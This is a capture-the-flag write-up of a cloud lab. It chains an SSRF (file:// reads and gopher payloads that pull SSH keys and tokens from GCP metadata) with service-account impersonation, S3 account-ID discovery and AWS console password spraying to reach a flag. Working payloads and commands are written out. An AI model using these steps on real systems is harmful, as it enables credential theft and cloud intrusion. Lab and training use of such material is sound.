Infiltrate (open the gate)

Solve

When clicking the refresh button, we can see that the web app sends a POST request with a local URL as the feed parameter. This is a classic SSRF vulnerability that we often see in cloud CTFs.

We are also able to achieve local file read by changing the protocol to file://.
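As a sketch, a request along these lines dumps /etc/passwd (the /refresh endpoint name and form encoding are assumptions on my part; only the feed parameter comes from the intercepted request):

  curl -s -X POST "http://<TARGET>/refresh" \
    --data-urlencode "feed=file:///etc/passwd"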

From the source code, we can see that there is blacklisting along with sanitization involved, so we are not able to get RCE. When attempting to query the instance metadata, I received an error message saying that the Metadata-Flavor request header is missing.

However, while doing research, I came across this technique on PayloadsAllTheThings, which uses the gopher protocol to embed request headers.

gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
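URL-decoded, everything after the leading x is the raw HTTP request that gopher writes to port 80. The gopher URL format treats the first character of the path as the item type and strips it, which is why the payload starts with a throwaway x:

  GET /computeMetadata/v1/instance/attributes/ssh-keys HTTP/1.1
  Host: metadata.google.internal
  Accept: */*
  Metadata-Flavor: Google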

By submitting the payload, we are able to list the SSH keys successfully as a proof of concept.

Listing the SSH keys

Next, I enumerated the metadata and got the access token.

gopher%3A%2F%2Fmetadata%2Egoogle%2Einternal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fservice%2Daccounts%2Fdefault%2Ftoken%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata%2Egoogle%2Einternal%250AAccept%3A%2520%252a%252f%252a%250aMetadata%2DFlavor%3A%2520Google%250d%250a
Getting the access token
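Decoding one layer of URL encoding (the payload is double-encoded so it survives being submitted as the feed parameter) shows it is the same gopher trick, pointed at the token endpoint:

  gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/service-accounts/default/token%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a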

From here, I was stuck for quite a while, trying to use the access token to enumerate the mp-compute2 service account's permissions. It was not until I DMed an admin for a hint that I was able to progress.

So apparently GCP Brute does not run testIamPermissions against a different service account, and we have to enumerate manually via the API.

  curl -X POST \
    -H "Authorization: Bearer $at" \
    -H "Content-Type: application/json" \
    --data '{
      "permissions": ["iam.serviceAccounts.getAccessToken"]
    }' \
    "https://iam.googleapis.com/v1/projects/-/serviceAccounts/[email protected]:testIamPermissions"
  
Checking if mp-compute2 has permissions over cloud-source

The cloud-source service account comes from the enumeration we performed earlier.

Since mp-compute2 is able to get an access token for cloud-source, let's get the access token and enumerate the cloud-source service account's permissions.

curl -X POST \
  -H "Authorization: Bearer $at" \
  -H "Content-Type: application/json" \
  "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/[email protected]:generateAccessToken" \
  -d '{
    "scope": [
      "https://www.googleapis.com/auth/cloud-platform"
    ],
    "lifetime": "3600s"
  }'
Getting the access token
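The response JSON carries the delegated token in an accessToken field; one way to capture it for the following steps (jq and the $ct variable name are my own choices):

  ct=$(curl -s -X POST \
    -H "Authorization: Bearer $at" \
    -H "Content-Type: application/json" \
    "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/cloud-source@<PROJECT_ID>.iam.gserviceaccount.com:generateAccessToken" \
    -d '{"scope": ["https://www.googleapis.com/auth/cloud-platform"], "lifetime": "3600s"}' \
    | jq -r .accessToken)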

With the new access token, let's enumerate the service account's permissions.

Bruteforcing permissions

From the output, we can see that the service account has permissions over Cloud Source Repositories, which is basically Google Cloud's version of GitHub.

So let's enumerate Cloud Source Repositories.

Setting environment variable to use gcloud cli with the access token
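For reference, gcloud will consume a raw OAuth token from the CLOUDSDK_AUTH_ACCESS_TOKEN environment variable, so something along these lines works (reusing the $ct token captured above; the project ID is a placeholder):

  export CLOUDSDK_AUTH_ACCESS_TOKEN=$ct
  export CLOUDSDK_CORE_PROJECT=<PROJECT_ID>   # so gcloud knows which project to query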

Enumerating cloud source repos.

gcloud source repos list

Cloning the repo.

gcloud source repos clone wholesale-distribution

Looking at the code of the cloned repo, it seems to just be a static HTML site. The only interesting part is that there's a public S3 bucket.

However, while enumerating the public bucket, all the files turned out to be standard libraries, with nothing interesting.

That's when I recalled a lab I had done before, which involved extracting the Account ID from an S3 bucket and doing further enumeration with that Account ID.

I will not be elaborating on the process of setting up the IAM user and policy; you can refer to the lab that was linked, or find a similar article in the reference section below.
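For context only, the setup boils down to a role in your own AWS account that you can assume and that has broad S3 read permissions; s3-account-search then assumes it repeatedly with session policies conditioned on s3:ResourceAccount to binary-search the owner's Account ID digit by digit. A rough sketch, not the exact lab setup:

  # trust.json should allow sts:AssumeRole from your own IAM user
  aws iam create-role --role-name s3_attacker_role \
    --assume-role-policy-document file://trust.json
  aws iam put-role-policy --role-name s3_attacker_role \
    --policy-name s3-read --policy-document \
    '{"Version": "2012-10-17",
      "Statement": [{"Effect": "Allow",
                     "Action": ["s3:GetObject", "s3:ListBucket"],
                     "Resource": "*"}]}'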

Here, I used s3-account-search to enumerate the Account ID, then used a curl request with the x-amz-expected-bucket-owner header to verify it.

s3-account-search arn:aws:iam::[MY AWS ACCOUNT ID]:role/s3_attacker_role  it-storage-3562577

curl -X GET "https://it-storage-3562577.s3.amazonaws.com" \
-H "x-amz-expected-bucket-owner: 975050229156"

If the Account ID is wrong, we will get an Access Denied error instead.

Next, I'll be spraying with GoAWSConsoleSpray again, using the username and password wordlists we saved previously. I managed to find credentials for haru with a reused password.

Let's enumerate the recently visited services to see if there's anything interesting.

Looking at Lambda, it looks like we have access to the function haru_test.

Looking at the function's source code, we are able to retrieve the flag.
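For completeness, with programmatic credentials the same source could be pulled via the AWS CLI rather than the console (hypothetical here, since the spray only yielded console access):

  aws lambda get-function --function-name haru_test \
    --query 'Code.Location' --output text   # presigned URL for the code package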

TLDR

  • Utilize parthaban's credentials to authenticate to the web application

  • Attack the web app with SSRF, using the gopher protocol to append the Metadata-Flavor header

  • Use testIamPermissions to check iam.serviceAccounts.getAccessToken against other service accounts for lateral movement

  • Perform lateral movement to the cloud-source service account

  • Enumerate Google Cloud Source Repositories and clone the repository

  • Utilize s3-account-search to retrieve AWS Account ID

  • Utilize GoAWSConsoleSpray to spray the AWS console with the newly retrieved Account ID

  • Retrieve the flag from AWS Lambda

Reference
